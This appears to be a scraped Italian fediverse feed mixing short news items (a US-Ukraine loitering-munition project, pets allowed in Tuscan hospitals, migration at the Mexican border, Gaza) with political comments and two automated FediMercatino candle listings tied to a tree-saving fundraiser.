Le forze armate americane e quelle ucraine sono divenute ancora più vicine, grazie all’ultima iniziativa relativa al comparto unmanned. Il nuovo progetto, chiamato “Artemis”, mira allo sviluppo di loitering munitions (termine tecnico per i sistemi comunemente noti come “droni kamikaze”)



Cani e gatti ammessi nelle Rsa e nelle strutture sanitarie, in Toscana adesso si può


Via libera della Regione all'accesso degli animali da affezione nelle strutture sanitarie, per migliorare il benessere dei pazienti a lunga degenza

[...]

Per gli ospedali deve essere concordato con il servizio di accoglienza il percorso per raggiungere la saletta di uso comune dove si svolgerà la visita. In ciascuna struttura è consentita la presenza di un solo animale per volta e le visite saranno pianificate per non creare sovrapposizioni. Alcuni reparti sono interdetti: gli animali non potranno accedere al pronto soccorso, a neonatologia, alle aree ambulatoriali, di dialisi, di prelievo e di ristoro, nei day hospital e nelle sale operatorie.


agi.it/cronaca/news/2025-03-18…





Tenere in piazza una lezione di etnocentrismo rivolgendosi direttamente ai giovani.
L'unica differenza è che Salvini avrebbe detto "Giosuè Manzoni".


direi che la sentenza della corte non sta sostenendo che l'ucraina abbia deliberatamente compiuto azioni di pulizia etnica verso qualcuno, ma solo che ci sono stante mancanze e carenze, cosa che succede specie quando magari l'organico è mal addestrato, mal pagato, mal preparato. all'epoca polizia ed esercito ucraino non era famoso per efficienza. e la scuola russa nell'uso dell'esercito ai fini dell'ordine pubblico è più simile alla strategia di invasione che non al rasserenare animi turbolenti. ricordo che in partenza l'esercito ucraino era del tutto simile all'esercito russo. pessima scuola, pessimo addestramento, gerarchia molto rigida, logica ottocentesca, e per di più praticamente disarmati in seguito alla separazione dall'URSS.


REPORTAGE VIDEO. Trump cambia la faccia dei confini dell’America Latina


@Notizie dall'Italia e dal mondo
Tapachula, la più grande città del confine sud tra Messico e Guatemala si è svuotata. Le code davanti agli uffici che permettono di avere i documenti per attraversare il paese o chiedere asilo negli USA non esistono più. Il video-reportage di Andrea Cegna dal



Oggi Palestina. A Napoli la giornata dedicata al cinema, alla cultura e all’attualità


@Notizie dall'Italia e dal mondo
A Napoli, una giornata dedicata alla Palestina, con proiezioni, testimonianze, presentazioni di libri, musica, incontri e tanto altro. Pagine Esteri, Life for Gaza, Associazione Pixel, Giuristi democratici e n’seaYet hanno organizzato per



Israele attacca Gaza, centinaia di palestinesi uccisi


@Notizie dall'Italia e dal mondo
I soccorritori riferiscono che i civili rappresentano la gran parte delle vittime. "E' un bagno di sangue".
L'articolo Israele attacca Gaza, centinaia di palestinesi uccisi proviene da Pagine Esteri.



💛 Candela cuore , profumata , gialla Pro Salvataggio alberi🌲🌲 via Pamphili - Questo è un post automatico da FediMercatino.it

Prezzo: 14 € euro

💛 Candela cuore , profumata , gialla

💛 Candela cuore , profumata , gialla , centrotavola segnaposto , gadget feste .
Misure 13 x 8 cm spessore 3 cm

Link diretto all'acquisto su subito 🛒👇

subito.it/arredamento-casaling…

Con l’acquisto di questo articolo

Puoi devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi

NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo

Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA

4fund.com/it/3mg8y9

pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo

💛 Heart candle, scented, yellow, centerpiece placeholder, party gadget.
💛 Bougie en forme de cœur, parfumée, jaune, pièce maîtresse, gadget de fête.
💛 Herzkerze, duftend, gelb, Platzhalter für Tafelaufsätze, Party-Gadget.
💛 Vela de corazón, perfumada, amarilla, marcador de posición central, accesorio para fiesta.
💛 Vela coração, perfumada, amarela, espaço reservado para mesa central, acessório de festa.
💛 Hartvormige kaars, geurend, geel, als middelpunt, als feestgadget.
💛 Häerz Käerz, parfüméierter, giel, zentrale Plazhalter, Party Gadget.
💛 Świeca w kształcie serca, zapachowa, żółta, jako ozdoba centralnej części stołu, gadżet na imprezę.
💛 Hjärtljus, doftljus, gult, platshållare i mitten, festpryl.
💛 Sviečka v tvare srdca, voňavá, žltá, stredový držiak, párty gadget.
💛 Sveča v obliki srca, dišeča, rumena, nadomestni element v središču, pripomoček za zabavo.
💛 Svijeća u obliku srca, mirisna, žuta, središnji držač mjesta, gadget za zabavu.
💛 Hjertelys, duft, gul, midterste pladsholder, festgadget.
💛 Sydänkynttilä, tuoksukynttilä, keltainen, keskipistepaikkamerkki, juhlavempain.

#candelaartistica
#candelagadgetfesta #candeladecorativa#candelacentrotavola #candelasegnaposto
#candelaprofumatacuore #candelacuoregiallo #candelaprofumata
#decorazionecasa #decorazioneambientibenessere

Price: 14 € euro :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

Per informazioni su fedimercatino Fedimercatino: Chi siamo

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️



🌲Candela Pino ,Abete verde Pro salvataggio Alberi 🌲🌲 Villa Pamphili Roma - Questo è un post automatico da FediMercatino.it

Prezzo: 16 € euro

🎄Candela Pino ,abete verde , albero natalizio, Decorazione centrotavola feste
Candela Pino Abete con base in legno naturale . Composizione cera , legno .Kiefern-Tannenkerze
📏Lungo 18 cm , base 9 cm
👉Disponibili 2 candele Abeti verdi

Link diretto all'acquisto su subito 🛒👇

subito.it/arredamento-casaling…

Con l’acquisto di questo articolo

Puoi devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi

NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo

Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA

4fund.com/it/3mg8y9

pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo

🌲 Pine Fir Candle with natural wood base.
🌲 Bougie en pin et sapin avec base en bois naturel
🌲 Kiefern-Tannenkerze mit natürlichem Holzsockel
🌲 Vela em pinho com base em madeira natural
🌲 Vela de pino abeto con base de madera natural
🌲 Dennenkaars met natuurlijke houten voet
🌲 Pine Fir Käerz mat Naturholz Basis
🌲 Świeca sosnowa z naturalną drewnianą podstawą

Price: 16 € euro :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

Per informazioni su fedimercatino Fedimercatino: Chi siamo

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️